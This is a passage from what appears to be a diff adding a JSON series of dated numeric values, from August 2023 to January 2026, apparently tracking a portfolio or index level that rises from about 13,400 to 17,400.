+ [ + "2023-08-14", + 13442.668004853633 + ], + [ + "2023-08-15", + 13444.244879734446 + ], + [ + "2023-08-16", + 13445.821939588539 + ], + [ + "2023-08-17", + 13447.399184437609 + ], + [ + "2023-08-18", + 13445.986614303358 + ], + [ + "2023-08-21", + 13485.866840926636 + ], + [ + "2023-08-22", + 13487.448783191354 + ], + [ + "2023-08-23", + 13489.030911023774 + ], + [ + "2023-08-24", + 13490.613224445664 + ], + [ + "2023-08-25", + 13489.205723478795 + ], + [ + "2023-08-28", + 13524.951735101584 + ], + [ + "2023-08-29", + 13526.538262169543 + ], + [ + "2023-08-30", + 13528.124975343018 + ], + [ + "2023-08-31", + 13529.711874643843 + ], + [ + "2023-09-01", + 13528.30896009385 + ], + [ + "2023-09-05", + 13563.626901879245 + ], + [ + "2023-09-06", + 13565.2179656879 + ], + [ + "2023-09-07", + 13566.809216134248 + ], + [ + "2023-09-08", + 13565.410653240184 + ], + [ + "2023-09-11", + 13592.305850331055 + ], + [ + "2023-09-12", + 13593.163449151087 + ], + [ + "2023-09-13", + 13609.539226783863 + ], + [ + "2023-09-14", + 13611.13567627874 + ], + [ + "2023-09-15", + 13612.732313043072 + ], + [ + "2023-09-18", + 13614.329137098826 + ], + [ + "2023-09-19", + 13615.926148467972 + ], + [ + "2023-09-20", + 13617.523347172482 + ], + [ + "2023-09-21", + 13619.120733234333 + ], + [ + "2023-09-22", + 13620.7183066755 + ], + [ + "2023-09-25", + 13622.316067517966 + ], + [ + "2023-09-26", + 13623.914015783712 + ], + [ + "2023-09-27", + 13625.512151494724 + ], + [ + "2023-09-28", + 13627.11047467299 + ], + [ + "2023-09-29", + 13628.708985340501 + ], + [ + "2023-10-02", + 13630.307683519251 + ], + [ + "2023-10-03", + 13631.906569231234 + ], + [ + "2023-10-04", + 13633.505642498449 + ], + [ + "2023-10-05", + 13635.104903342897 + ], + [ + "2023-10-06", + 13636.704351786582 + ], + [ + "2023-10-09", + 13638.30398785151 + ], + [ + "2023-10-10", + 13639.903811559689 + ], + [ + "2023-10-11", + 13641.50382293313 + ], + [ + "2023-10-12", + 13643.104021993846 + ], + [ + "2023-10-13", + 13644.704408763855 + ], + [ + "2023-10-16", + 13646.304983265176 + ], + [ + "2023-10-17", + 13647.90574551983 + ], + [ + "2023-10-18", + 13649.506695549842 + ], + [ + "2023-10-19", + 13651.107833377238 + ], + [ + "2023-10-20", + 13652.709159024049 + ], + [ + "2023-10-23", + 13654.310672512303 + ], + [ + "2023-10-24", + 13655.91237386404 + ], + [ + "2023-10-25", + 13657.514263101291 + ], + [ + "2023-10-26", + 13659.1163402461 + ], + [ + "2023-10-27", + 13660.718605320508 + ], + [ + "2023-10-30", + 13662.321058346559 + ], + [ + "2023-10-31", + 13663.923699346302 + ], + [ + "2023-11-01", + 13665.526528341787 + ], + [ + "2023-11-02", + 13667.129545355065 + ], + [ + "2023-11-03", + 13665.742750408192 + ], + [ + "2023-11-06", + 13683.624310329995 + ], + [ + "2023-11-07", + 13698.08146569583 + ], + [ + "2023-11-08", + 13699.688301524164 + ], + [ + "2023-11-09", + 13701.295325840307 + ], + [ + "2023-11-10", + 13699.91253866637 + ], + [ + "2023-11-13", + 13707.881137640976 + ], + [ + "2023-11-14", + 13752.02038095827 + ], + [ + "2023-11-15", + 13753.633544021684 + ], + [ + "2023-11-16", + 13755.246896315117 + ], + [ + "2023-11-17", + 13756.860437860765 + ], + [ + "2023-11-20", + 13758.474168680828 + ], + [ + "2023-11-21", + 13760.08808879751 + ], + [ + "2023-11-22", + 13761.702198233015 + ], + [ + "2023-11-24", + 13763.316497009551 + ], + [ + "2023-11-27", + 13764.930985149329 + ], + [ + "2023-11-28", + 13766.545662674562 + ], + [ + "2023-11-29", + 13768.160529607465 + ], + [ + "2023-11-30", + 13769.775585970257 + ], + [ + "2023-12-01", + 13771.390831785158 + ], + [ + "2023-12-04", + 13773.006267074392 + ], + [ + "2023-12-05", + 13774.621891860184 + ], + [ + "2023-12-06", + 13776.237706164766 + ], + [ + "2023-12-07", + 13777.853710010366 + ], + [ + "2023-12-08", + 13779.469903419218 + ], + [ + "2023-12-11", + 13781.08628641356 + ], + [ + "2023-12-12", + 13782.70285901563 + ], + [ + "2023-12-13", + 13784.319621247669 + ], + [ + "2023-12-14", + 13785.936573131921 + ], + [ + "2023-12-15", + 13787.553714690635 + ], + [ + "2023-12-18", + 13789.171045946061 + ], + [ + "2023-12-19", + 13790.78856692045 + ], + [ + "2023-12-20", + 13792.406277636055 + ], + [ + "2023-12-21", + 13794.024178115136 + ], + [ + "2023-12-22", + 13795.642268379952 + ], + [ + "2023-12-26", + 13797.260548452765 + ], + [ + "2023-12-27", + 13798.87901835584 + ], + [ + "2023-12-28", + 13800.497678111446 + ], + [ + "2023-12-29", + 13802.116527741851 + ], + [ + "2024-01-02", + 13803.735567269332 + ], + [ + "2024-01-03", + 13805.354796716161 + ], + [ + "2024-01-04", + 13806.974216104618 + ], + [ + "2024-01-05", + 13805.603825456983 + ], + [ + "2024-01-08", + 13869.089544145676 + ], + [ + "2024-01-09", + 13870.716439856707 + ], + [ + "2024-01-10", + 13872.343526408647 + ], + [ + "2024-01-11", + 13873.970803823882 + ], + [ + "2024-01-12", + 13872.608272124802 + ], + [ + "2024-01-16", + 13931.172728241054 + ], + [ + "2024-01-17", + 13932.806906540145 + ], + [ + "2024-01-18", + 13934.44127653442 + ], + [ + "2024-01-19", + 13936.075838246366 + ], + [ + "2024-01-22", + 13937.710591698471 + ], + [ + "2024-01-23", + 13939.345536913226 + ], + [ + "2024-01-24", + 13940.980673913127 + ], + [ + "2024-01-25", + 13942.616002720672 + ], + [ + "2024-01-26", + 13941.261523358358 + ], + [ + "2024-01-29", + 14001.712677288966 + ], + [ + "2024-01-30", + 14003.355130186055 + ], + [ + "2024-01-31", + 14004.997775748969 + ], + [ + "2024-02-01", + 14006.640614000307 + ], + [ + "2024-02-02", + 14005.293644962672 + ], + [ + "2024-02-05", + 14061.631740196213 + ], + [ + "2024-02-06", + 14063.281221821911 + ], + [ + "2024-02-07", + 14064.930896937929 + ], + [ + "2024-02-08", + 14066.580765566965 + ], + [ + "2024-02-09", + 14068.230827731719 + ], + [ + "2024-02-12", + 14069.881083454891 + ], + [ + "2024-02-13", + 14071.531532759189 + ], + [ + "2024-02-14", + 14073.18217566732 + ], + [ + "2024-02-15", + 14074.833012201994 + ], + [ + "2024-02-16", + 14076.484042385926 + ], + [ + "2024-02-20", + 14078.135266241829 + ], + [ + "2024-02-21", + 14079.786683792423 + ], + [ + "2024-02-22", + 14081.438295060429 + ], + [ + "2024-02-23", + 14080.10010006857 + ], + [ + "2024-02-26", + 14154.101967261233 + ], + [ + "2024-02-27", + 14155.762295987985 + ], + [ + "2024-02-28", + 14157.422819477462 + ], + [ + "2024-02-29", + 14159.08353775251 + ], + [ + "2024-03-01", + 14160.744450835982 + ], + [ + "2024-03-04", + 14162.405558750726 + ], + [ + "2024-03-05", + 14164.066861519597 + ], + [ + "2024-03-06", + 14165.728359165452 + ], + [ + "2024-03-07", + 14167.390051711152 + ], + [ + "2024-03-08", + 14166.061939179557 + ], + [ + "2024-03-11", + 14160.510066623689 + ], + [ + "2024-03-12", + 14278.42308949899 + ], + [ + "2024-03-13", + 14280.098001555089 + ], + [ + "2024-03-14", + 14281.77311008459 + ], + [ + "2024-03-15", + 14280.458415110545 + ], + [ + "2024-03-18", + 14341.915838422703 + ], + [ + "2024-03-19", + 14336.66640199682 + ], + [ + "2024-03-20", + 14419.06905704809 + ], + [ + "2024-03-21", + 14420.760467398517 + ], + [ + "2024-03-22", + 14419.46207615766 + ], + [ + "2024-03-25", + 14467.455419572565 + ], + [ + "2024-03-26", + 14466.369552736593 + ], + [ + "2024-03-27", + 14537.897403202327 + ], + [ + "2024-03-28", + 14539.602752559067 + ], + [ + "2024-04-01", + 14541.30830195962 + ], + [ + "2024-04-02", + 14543.014051427452 + ], + [ + "2024-04-03", + 14544.72000098603 + ], + [ + "2024-04-04", + 14546.426150658828 + ], + [ + "2024-04-05", + 14545.14250046932 + ], + [ + "2024-04-08", + 14608.72687871843 + ], + [ + "2024-04-09", + 14610.440536635697 + ], + [ + "2024-04-10", + 14612.154395571402 + ], + [ + "2024-04-11", + 14613.868455549125 + ], + [ + "2024-04-12", + 14612.59271659245 + ], + [ + "2024-04-15", + 14595.391402339761 + ], + [ + "2024-04-16", + 14638.537662814984 + ], + [ + "2024-04-17", + 14473.177046335322 + ], + [ + "2024-04-18", + 14292.32370206862 + ], + [ + "2024-04-19", + 13884.879397130519 + ], + [ + "2024-04-22", + 13980.271653582677 + ], + [ + "2024-04-23", + 14046.331784878854 + ], + [ + "2024-04-24", + 14071.134909779137 + ], + [ + "2024-04-25", + 14078.3194953808 + ], + [ + "2024-04-26", + 14076.907084941082 + ], + [ + "2024-04-29", + 14145.236481220321 + ], + [ + "2024-04-30", + 14146.895769992636 + ], + [ + "2024-05-01", + 14148.555253405684 + ], + [ + "2024-05-02", + 14150.2149314823 + ], + [ + "2024-05-03", + 14148.88480424532 + ], + [ + "2024-05-06", + 14247.310257722973 + ], + [ + "2024-05-07", + 14248.981520128355 + ], + [ + "2024-05-08", + 14250.652978579024 + ], + [ + "2024-05-09", + 14252.324633097978 + ], + [ + "2024-05-10", + 14251.006483708214 + ], + [ + "2024-05-13", + 14312.510623741373 + ], + [ + "2024-05-14", + 14361.12967129959 + ], + [ + "2024-05-15", + 14362.814285144892 + ], + [ + "2024-05-16", + 14364.499096601654 + ], + [ + "2024-05-17", + 14363.194105693057 + ], + [ + "2024-05-20", + 14445.549389005144 + ], + [ + "2024-05-21", + 14447.243905596853 + ], + [ + "2024-05-22", + 14448.938620961651 + ], + [ + "2024-05-23", + 14450.633535122855 + ], + [ + "2024-05-24", + 14452.328648103787 + ], + [ + "2024-05-28", + 14454.023959927765 + ], + [ + "2024-05-29", + 14455.719470618116 + ], + [ + "2024-05-30", + 14457.415180198168 + ], + [ + "2024-05-31", + 14459.111088691252 + ], + [ + "2024-06-03", + 14460.8071961207 + ], + [ + "2024-06-04", + 14462.50350250985 + ], + [ + "2024-06-05", + 14464.200007882038 + ], + [ + "2024-06-06", + 14465.896712260606 + ], + [ + "2024-06-07", + 14464.6036156689 + ], + [ + "2024-06-10", + 14540.61111392126 + ], + [ + "2024-06-11", + 14542.316781606347 + ], + [ + "2024-06-12", + 14544.022649372586 + ], + [ + "2024-06-13", + 14545.72871724345 + ], + [ + "2024-06-14", + 14547.434985242411 + ], + [ + "2024-06-17", + 14549.141453392946 + ], + [ + "2024-06-18", + 14550.84812171853 + ], + [ + "2024-06-20", + 14552.55499024265 + ], + [ + "2024-06-21", + 14551.272058988785 + ], + [ + "2024-06-24", + 14392.154897192138 + ], + [ + "2024-06-25", + 14536.030209583683 + ], + [ + "2024-06-26", + 14552.321332287804 + ], + [ + "2024-06-27", + 14549.814266127158 + ], + [ + "2024-06-28", + 14689.2974856174 + ], + [ + "2024-07-01", + 14748.446965426747 + ], + [ + "2024-07-02", + 14800.562914665192 + ], + [ + "2024-07-03", + 14802.299075661922 + ], + [ + "2024-07-05", + 14801.045440316786 + ], + [ + "2024-07-08", + 14892.26103317547 + ], + [ + "2024-07-09", + 14894.007950702053 + ], + [ + "2024-07-10", + 14895.75507314855 + ], + [ + "2024-07-11", + 14897.502400538999 + ], + [ + "2024-07-12", + 14896.25993289744 + ], + [ + "2024-07-15", + 14965.315364548076 + ], + [ + "2024-07-16", + 15005.17328836324 + ], + [ + "2024-07-17", + 15006.933450916695 + ], + [ + "2024-07-18", + 15008.693819943754 + ], + [ + "2024-07-19", + 15007.464395468638 + ], + [ + "2024-07-22", + 15158.142930404092 + ], + [ + "2024-07-23", + 15159.921036864662 + ], + [ + "2024-07-24", + 15161.699351903722 + ], + [ + "2024-07-25", + 15163.477875545743 + ], + [ + "2024-07-26", + 15162.266607815189 + ], + [ + "2024-07-29", + 15236.129864754355 + ], + [ + "2024-07-30", + 15050.292549148546 + ], + [ + "2024-07-31", + 15330.492351320145 + ], + [ + "2024-08-01", + 15332.290675007866 + ], + [ + "2024-08-02", + 15331.099209645634 + ], + [ + "2024-08-05", + 15352.610998459866 + ], + [ + "2024-08-06", + 15410.864370655176 + ], + [ + "2024-08-07", + 15336.263139239054 + ], + [ + "2024-08-08", + 15542.05852086078 + ], + [ + "2024-08-09", + 15540.89166204591 + ], + [ + "2024-08-12", + 15636.94818487926 + ], + [ + "2024-08-13", + 15745.882374986983 + ], + [ + "2024-08-14", + 15747.729425467169 + ], + [ + "2024-08-15", + 15749.576692613236 + ], + [ + "2024-08-16", + 15748.4341764506 + ], + [ + "2024-08-19", + 15917.008067319286 + ], + [ + "2024-08-20", + 15918.875191478715 + ], + [ + "2024-08-21", + 15920.742534658742 + ], + [ + "2024-08-22", + 15922.61009688506 + ], + [ + "2024-08-23", + 15921.487878183363 + ], + [ + "2024-08-26", + 15894.500026724489 + ], + [ + "2024-08-27", + 15996.742429372482 + ], + [ + "2024-08-28", + 15970.00821304995 + ], + [ + "2024-08-29", + 16014.77725171175 + ], + [ + "2024-08-30", + 16239.48565878238 + ], + [ + "2024-09-03", + 15773.294348702975 + ], + [ + "2024-09-04", + 15810.539998048085 + ], + [ + "2024-09-05", + 15770.116043516868 + ], + [ + "2024-09-06", + 15394.923424288292 + ], + [ + "2024-09-09", + 15513.300268184024 + ], + [ + "2024-09-10", + 15567.35311567768 + ], + [ + "2024-09-11", + 15641.336904307947 + ], + [ + "2024-09-12", + 15648.725430713352 + ], + [ + "2024-09-13", + 15648.666711285852 + ], + [ + "2024-09-16", + 15664.61557523187 + ], + [ + "2024-09-17", + 15694.360643948276 + ], + [ + "2024-09-18", + 15680.981494968764 + ], + [ + "2024-09-19", + 15818.739917360313 + ], + [ + "2024-09-20", + 15817.605514300802 + ], + [ + "2024-09-23", + 15897.331181060194 + ], + [ + "2024-09-24", + 15949.5686548724 + ], + [ + "2024-09-25", + 15951.439598509674 + ], + [ + "2024-09-26", + 15953.310761615585 + ], + [ + "2024-09-27", + 15952.192144215878 + ], + [ + "2024-09-30", + 15993.41660263675 + ], + [ + "2024-10-01", + 15921.566453013618 + ], + [ + "2024-10-02", + 16015.77354726545 + ], + [ + "2024-10-03", + 16064.730939663836 + ], + [ + "2024-10-04", + 16063.62539226481 + ], + [ + "2024-10-07", + 16103.739677794742 + ], + [ + "2024-10-08", + 16143.94956682816 + ], + [ + "2024-10-09", + 16145.843312068304 + ], + [ + "2024-10-10", + 16147.737279451798 + ], + [ + "2024-10-11", + 16149.6314690047 + ], + [ + "2024-10-14", + 16151.525880753072 + ], + [ + "2024-10-15", + 16153.420514722977 + ], + [ + "2024-10-16", + 16155.315370940483 + ], + [ + "2024-10-17", + 16157.21044943166 + ], + [ + "2024-10-18", + 16156.115750222583 + ], + [ + "2024-10-21", + 16192.434870490051 + ], + [ + "2024-10-22", + 16200.228494406845 + ], + [ + "2024-10-23", + 16192.735132777894 + ], + [ + "2024-10-24", + 16239.10187007353 + ], + [ + "2024-10-25", + 16241.006777032226 + ], + [ + "2024-10-28", + 16242.911907443582 + ], + [ + "2024-10-29", + 16244.81726133381 + ], + [ + "2024-10-30", + 16246.722838729127 + ], + [ + "2024-10-31", + 16248.62863965575 + ], + [ + "2024-11-01", + 16247.544664139898 + ], + [ + "2024-11-04", + 16272.005970272421 + ], + [ + "2024-11-05", + 16310.263638606883 + ], + [ + "2024-11-06", + 16312.17689310531 + ], + [ + "2024-11-07", + 16314.090372035596 + ], + [ + "2024-11-08", + 16313.014075424067 + ], + [ + "2024-11-11", + 16256.14959170314 + ], + [ + "2024-11-12", + 16231.290902026363 + ], + [ + "2024-11-13", + 16080.622655044925 + ], + [ + "2024-11-14", + 16078.608347846148 + ], + [ + "2024-11-15", + 15786.643742469021 + ], + [ + "2024-11-18", + 15871.669018698089 + ], + [ + "2024-11-19", + 15896.224339047065 + ], + [ + "2024-11-20", + 15885.927836037983 + ], + [ + "2024-11-21", + 15957.29089978651 + ], + [ + "2024-11-22", + 15974.643402702142 + ], + [ + "2024-11-25", + 16027.417639684674 + ], + [ + "2024-11-26", + 16029.297715296985 + ], + [ + "2024-11-27", + 16031.178011449148 + ], + [ + "2024-11-29", + 16033.058528167032 + ], + [ + "2024-12-02", + 16034.93926547651 + ], + [ + "2024-12-03", + 16036.820223403462 + ], + [ + "2024-12-04", + 16038.701401973762 + ], + [ + "2024-12-05", + 16040.582801213295 + ], + [ + "2024-12-06", + 16042.464421147946 + ], + [ + "2024-12-09", + 16044.346261803605 + ], + [ + "2024-12-10", + 16046.22832320616 + ], + [ + "2024-12-11", + 16048.110605381507 + ], + [ + "2024-12-12", + 16049.993108355544 + ], + [ + "2024-12-13", + 16051.875832154172 + ], + [ + "2024-12-16", + 16053.758776803294 + ], + [ + "2024-12-17", + 16055.641942328815 + ], + [ + "2024-12-18", + 16057.525328756647 + ], + [ + "2024-12-19", + 16059.4089361127 + ], + [ + "2024-12-20", + 16058.302764422893 + ], + [ + "2024-12-23", + 16120.232953206287 + ], + [ + "2024-12-24", + 16122.123916399574 + ], + [ + "2024-12-26", + 16124.015101409866 + ], + [ + "2024-12-27", + 16122.916508263184 + ], + [ + "2024-12-30", + 16093.530186761662 + ], + [ + "2024-12-31", + 16083.38119172511 + ], + [ + "2025-01-02", + 16146.586391982159 + ], + [ + "2025-01-03", + 16213.126647679106 + ], + [ + "2025-01-06", + 16288.350836424619 + ], + [ + "2025-01-07", + 16290.26152046997 + ], + [ + "2025-01-08", + 16292.172428645656 + ], + [ + "2025-01-10", + 16291.093560977966 + ], + [ + "2025-01-13", + 16326.891192161716 + ], + [ + "2025-01-14", + 16346.439664607604 + ], + [ + "2025-01-15", + 16348.357162688233 + ], + [ + "2025-01-16", + 16350.274885698509 + ], + [ + "2025-01-17", + 16349.202833664818 + ], + [ + "2025-01-21", + 16430.503942410924 + ], + [ + "2025-01-22", + 16432.43130154354 + ], + [ + "2025-01-23", + 16434.35888676254 + ], + [ + "2025-01-24", + 16436.286698094445 + ], + [ + "2025-01-27", + 16438.21473556578 + ], + [ + "2025-01-28", + 16440.14299920307 + ], + [ + "2025-01-29", + 16442.07148903285 + ], + [ + "2025-01-30", + 16444.000205081644 + ], + [ + "2025-01-31", + 16442.939147375993 + ], + [ + "2025-02-03", + 16433.18062994562 + ], + [ + "2025-02-04", + 16483.061753143582 + ], + [ + "2025-02-05", + 16540.879219597562 + ], + [ + "2025-02-06", + 16542.819526160107 + ], + [ + "2025-02-07", + 16541.770060327817 + ], + [ + "2025-02-10", + 16606.660301341286 + ], + [ + "2025-02-11", + 16608.608324269022 + ], + [ + "2025-02-12", + 16610.55657570708 + ], + [ + "2025-02-13", + 16612.505055682268 + ], + [ + "2025-02-14", + 16611.463764221393 + ], + [ + "2025-02-18", + 16697.792728161523 + ], + [ + "2025-02-19", + 16699.751441261375 + ], + [ + "2025-02-20", + 16701.71038412555 + ], + [ + "2025-02-21", + 16700.679556780993 + ], + [ + "2025-02-24", + 16662.890933862887 + ], + [ + "2025-02-25", + 16604.83526516111 + ], + [ + "2025-02-26", + 16708.778039289973 + ], + [ + "2025-02-27", + 16293.051846671908 + ], + [ + "2025-02-28", + 16389.176861516826 + ], + [ + "2025-03-03", + 16262.291220312163 + ], + [ + "2025-03-04", + 16277.868404400951 + ], + [ + "2025-03-05", + 16408.689123762128 + ], + [ + "2025-03-06", + 16140.13278820869 + ], + [ + "2025-03-07", + 16302.735246152271 + ], + [ + "2025-03-10", + 16127.293747226538 + ], + [ + "2025-03-11", + 16071.354502633849 + ], + [ + "2025-03-12", + 16161.4557996006 + ], + [ + "2025-03-13", + 16142.275563259804 + ], + [ + "2025-03-14", + 16310.852213129237 + ], + [ + "2025-03-17", + 16394.246952356818 + ], + [ + "2025-03-18", + 16375.656623064322 + ], + [ + "2025-03-19", + 16419.222444847284 + ], + [ + "2025-03-20", + 16423.963443540128 + ], + [ + "2025-03-21", + 16402.68435666181 + ], + [ + "2025-03-24", + 16507.234627369628 + ], + [ + "2025-03-25", + 16512.980485579912 + ], + [ + "2025-03-26", + 16449.334363204878 + ], + [ + "2025-03-27", + 16388.627483480366 + ], + [ + "2025-03-28", + 16214.947645027925 + ], + [ + "2025-03-31", + 16244.07081028124 + ], + [ + "2025-04-01", + 16257.058922785396 + ], + [ + "2025-04-02", + 16290.281316834458 + ], + [ + "2025-04-03", + 15860.60662639355 + ], + [ + "2025-04-04", + 15592.265828597525 + ], + [ + "2025-04-07", + 15634.914092106183 + ], + [ + "2025-04-08", + 15597.730742877342 + ], + [ + "2025-04-09", + 15691.151564521604 + ], + [ + "2025-04-10", + 15674.59763605723 + ], + [ + "2025-04-11", + 15693.67394013706 + ], + [ + "2025-04-14", + 15735.749507863986 + ], + [ + "2025-04-15", + 15751.541186789616 + ], + [ + "2025-04-16", + 15753.388901069444 + ], + [ + "2025-04-17", + 15755.236832093018 + ], + [ + "2025-04-21", + 15757.084979885763 + ], + [ + "2025-04-22", + 15758.93334447311 + ], + [ + "2025-04-23", + 15760.781925880485 + ], + [ + "2025-04-24", + 15762.630724133325 + ], + [ + "2025-04-25", + 15761.489739257067 + ], + [ + "2025-04-28", + 15800.30661195711 + ], + [ + "2025-04-29", + 15801.661935789756 + ], + [ + "2025-04-30", + 15831.306967597728 + ], + [ + "2025-05-01", + 15833.16403869988 + ], + [ + "2025-05-02", + 15832.03132764337 + ], + [ + "2025-05-05", + 15866.7968488303 + ], + [ + "2025-05-06", + 15869.39321784699 + ], + [ + "2025-05-07", + 15913.460880485292 + ], + [ + "2025-05-08", + 15915.327588546532 + ], + [ + "2025-05-09", + 15914.204515579559 + ], + [ + "2025-05-12", + 15960.62208044981 + ], + [ + "2025-05-13", + 15962.494320694954 + ], + [ + "2025-05-14", + 15964.366780560833 + ], + [ + "2025-05-15", + 15966.239460073208 + ], + [ + "2025-05-16", + 15968.112359257844 + ], + [ + "2025-05-19", + 15969.98547814051 + ], + [ + "2025-05-20", + 15971.858816746979 + ], + [ + "2025-05-21", + 15973.732375103024 + ], + [ + "2025-05-22", + 15975.606153234421 + ], + [ + "2025-05-23", + 15974.490151166952 + ], + [ + "2025-05-27", + 16023.266068506678 + ], + [ + "2025-05-28", + 16025.145657124272 + ], + [ + "2025-05-29", + 16027.025466224592 + ], + [ + "2025-05-30", + 16025.915495833497 + ], + [ + "2025-06-02", + 16067.047998272115 + ], + [ + "2025-06-03", + 16068.93272267267 + ], + [ + "2025-06-04", + 16070.817668158394 + ], + [ + "2025-06-05", + 16072.702834755224 + ], + [ + "2025-06-06", + 16074.588222489097 + ], + [ + "2025-06-09", + 16076.473831385954 + ], + [ + "2025-06-10", + 16078.359661471739 + ], + [ + "2025-06-11", + 16080.245712772396 + ], + [ + "2025-06-12", + 16082.131985313874 + ], + [ + "2025-06-13", + 16084.018479122127 + ], + [ + "2025-06-16", + 16085.90519422311 + ], + [ + "2025-06-17", + 16087.792130642782 + ], + [ + "2025-06-18", + 16089.679288407102 + ], + [ + "2025-06-20", + 16091.566667542038 + ], + [ + "2025-06-23", + 16093.454268073556 + ], + [ + "2025-06-24", + 16095.342090027625 + ], + [ + "2025-06-25", + 16097.230133430221 + ], + [ + "2025-06-26", + 16099.11839830732 + ], + [ + "2025-06-27", + 16101.006884684903 + ], + [ + "2025-06-30", + 16102.89559258895 + ], + [ + "2025-07-01", + 16104.78452204545 + ], + [ + "2025-07-02", + 16106.67367308039 + ], + [ + "2025-07-03", + 16108.563045719762 + ], + [ + "2025-07-07", + 16110.452639989562 + ], + [ + "2025-07-08", + 16112.342455915787 + ], + [ + "2025-07-09", + 16114.232493524438 + ], + [ + "2025-07-10", + 16116.12275284152 + ], + [ + "2025-07-11", + 16118.01323389304 + ], + [ + "2025-07-14", + 16119.903936705008 + ], + [ + "2025-07-15", + 16121.794861303439 + ], + [ + "2025-07-16", + 16123.686007714346 + ], + [ + "2025-07-17", + 16125.577375963752 + ], + [ + "2025-07-18", + 16127.468966077678 + ], + [ + "2025-07-21", + 16129.36077808215 + ], + [ + "2025-07-22", + 16131.252812003195 + ], + [ + "2025-07-23", + 16133.145067866844 + ], + [ + "2025-07-24", + 16135.037545699135 + ], + [ + "2025-07-25", + 16136.930245526104 + ], + [ + "2025-07-28", + 16138.823167373792 + ], + [ + "2025-07-29", + 16140.716311268243 + ], + [ + "2025-07-30", + 16142.609677235503 + ], + [ + "2025-07-31", + 16144.503265301622 + ], + [ + "2025-08-01", + 16146.397075492654 + ], + [ + "2025-08-04", + 16148.291107834655 + ], + [ + "2025-08-05", + 16150.185362353684 + ], + [ + "2025-08-06", + 16152.079839075803 + ], + [ + "2025-08-07", + 16153.974538027076 + ], + [ + "2025-08-08", + 16155.869459233574 + ], + [ + "2025-08-11", + 16157.764602721367 + ], + [ + "2025-08-12", + 16159.65996851653 + ], + [ + "2025-08-13", + 16161.555556645138 + ], + [ + "2025-08-14", + 16163.451367133275 + ], + [ + "2025-08-15", + 16165.347400007022 + ], + [ + "2025-08-18", + 16167.243655292466 + ], + [ + "2025-08-19", + 16169.140133015699 + ], + [ + "2025-08-20", + 16171.03683320281 + ], + [ + "2025-08-21", + 16172.933755879898 + ], + [ + "2025-08-22", + 16174.83090107306 + ], + [ + "2025-08-25", + 16176.728268808401 + ], + [ + "2025-08-26", + 16178.625859112024 + ], + [ + "2025-08-27", + 16180.523672010037 + ], + [ + "2025-08-28", + 16182.421707528549 + ], + [ + "2025-08-29", + 16184.319965693678 + ], + [ + "2025-09-02", + 16186.218446531539 + ], + [ + "2025-09-03", + 16188.117150068252 + ], + [ + "2025-09-04", + 16190.016076329943 + ], + [ + "2025-09-05", + 16191.915225342736 + ], + [ + "2025-09-08", + 16193.814597132761 + ], + [ + "2025-09-09", + 16195.71419172615 + ], + [ + "2025-09-10", + 16197.614009149042 + ], + [ + "2025-09-11", + 16199.514049427571 + ], + [ + "2025-09-12", + 16201.414312587882 + ], + [ + "2025-09-15", + 16203.31479865612 + ], + [ + "2025-09-16", + 16205.215507658431 + ], + [ + "2025-09-17", + 16207.116439620968 + ], + [ + "2025-09-18", + 16209.017594569883 + ], + [ + "2025-09-19", + 16210.918972531334 + ], + [ + "2025-09-22", + 16212.82057353148 + ], + [ + "2025-09-23", + 16214.722397596488 + ], + [ + "2025-09-24", + 16216.62444475252 + ], + [ + "2025-09-25", + 16218.526715025748 + ], + [ + "2025-09-26", + 16220.429208442343 + ], + [ + "2025-09-29", + 16222.331925028482 + ], + [ + "2025-09-30", + 16224.234864810343 + ], + [ + "2025-10-01", + 16226.138027814108 + ], + [ + "2025-10-02", + 16228.041414065961 + ], + [ + "2025-10-03", + 16229.94502359209 + ], + [ + "2025-10-06", + 16231.848856418686 + ], + [ + "2025-10-07", + 16233.752912571943 + ], + [ + "2025-10-08", + 16235.657192078059 + ], + [ + "2025-10-09", + 16237.561694963233 + ], + [ + "2025-10-10", + 16236.476421253668 + ], + [ + "2025-10-13", + 16347.851471361331 + ], + [ + "2025-10-14", + 16349.769135052136 + ], + [ + "2025-10-15", + 16351.687023692013 + ], + [ + "2025-10-16", + 16353.605137307351 + ], + [ + "2025-10-17", + 16352.53347592454 + ], + [ + "2025-10-20", + 16463.236930411564 + ], + [ + "2025-10-21", + 16465.168129245238 + ], + [ + "2025-10-22", + 16467.099554615706 + ], + [ + "2025-10-23", + 16469.031206549545 + ], + [ + "2025-10-24", + 16467.97308507333 + ], + [ + "2025-10-27", + 16618.89331466104 + ], + [ + "2025-10-28", + 16620.84277256667 + ], + [ + "2025-10-29", + 16622.79245915095 + ], + [ + "2025-10-30", + 16624.74237444071 + ], + [ + "2025-10-31", + 16626.692518462773 + ], + [ + "2025-11-03", + 16628.642891243973 + ], + [ + "2025-11-04", + 16630.593492811142 + ], + [ + "2025-11-05", + 16632.54432319112 + ], + [ + "2025-11-06", + 16634.495382410747 + ], + [ + "2025-11-07", + 16633.456670496867 + ], + [ + "2025-11-10", + 16770.579429895944 + ], + [ + "2025-11-11", + 16772.54668114623 + ], + [ + "2025-11-12", + 16774.51416316239 + ], + [ + "2025-11-13", + 16776.481875971494 + ], + [ + "2025-11-14", + 16775.45981960062 + ], + [ + "2025-11-17", + 16758.79144799871 + ], + [ + "2025-11-18", + 16639.8324880514 + ], + [ + "2025-11-19", + 16771.212393456124 + ], + [ + "2025-11-20", + 16360.363858167078 + ], + [ + "2025-11-21", + 16451.49803665041 + ], + [ + "2025-11-24", + 16646.67616072352 + ], + [ + "2025-11-25", + 16672.728568605784 + ], + [ + "2025-11-26", + 16711.64429268107 + ], + [ + "2025-11-28", + 16715.136841535903 + ], + [ + "2025-12-01", + 16788.659136467402 + ], + [ + "2025-12-02", + 16866.97354465659 + ], + [ + "2025-12-03", + 16868.952103294527 + ], + [ + "2025-12-04", + 16870.93089402474 + ], + [ + "2025-12-05", + 16869.919916874456 + ], + [ + "2025-12-08", + 16977.82401187222 + ], + [ + "2025-12-09", + 16979.81557368164 + ], + [ + "2025-12-10", + 16981.807369108657 + ], + [ + "2025-12-11", + 16983.799398180676 + ], + [ + "2025-12-12", + 16982.8016609251 + ], + [ + "2025-12-15", + 17030.739379420313 + ], + [ + "2025-12-16", + 17038.07973695406 + ], + [ + "2025-12-17", + 16805.09026523409 + ], + [ + "2025-12-18", + 17022.662968171233 + ], + [ + "2025-12-19", + 17159.737442925816 + ], + [ + "2025-12-22", + 17253.392050995535 + ], + [ + "2025-12-23", + 17255.41593795936 + ], + [ + "2025-12-24", + 17257.44006233264 + ], + [ + "2025-12-26", + 17256.47442414323 + ], + [ + "2025-12-29", + 17302.613949934283 + ], + [ + "2025-12-30", + 17321.407072589263 + ], + [ + "2025-12-31", + 17295.27498234788 + ], + [ + "2026-01-02", + 17392.601029850994 + 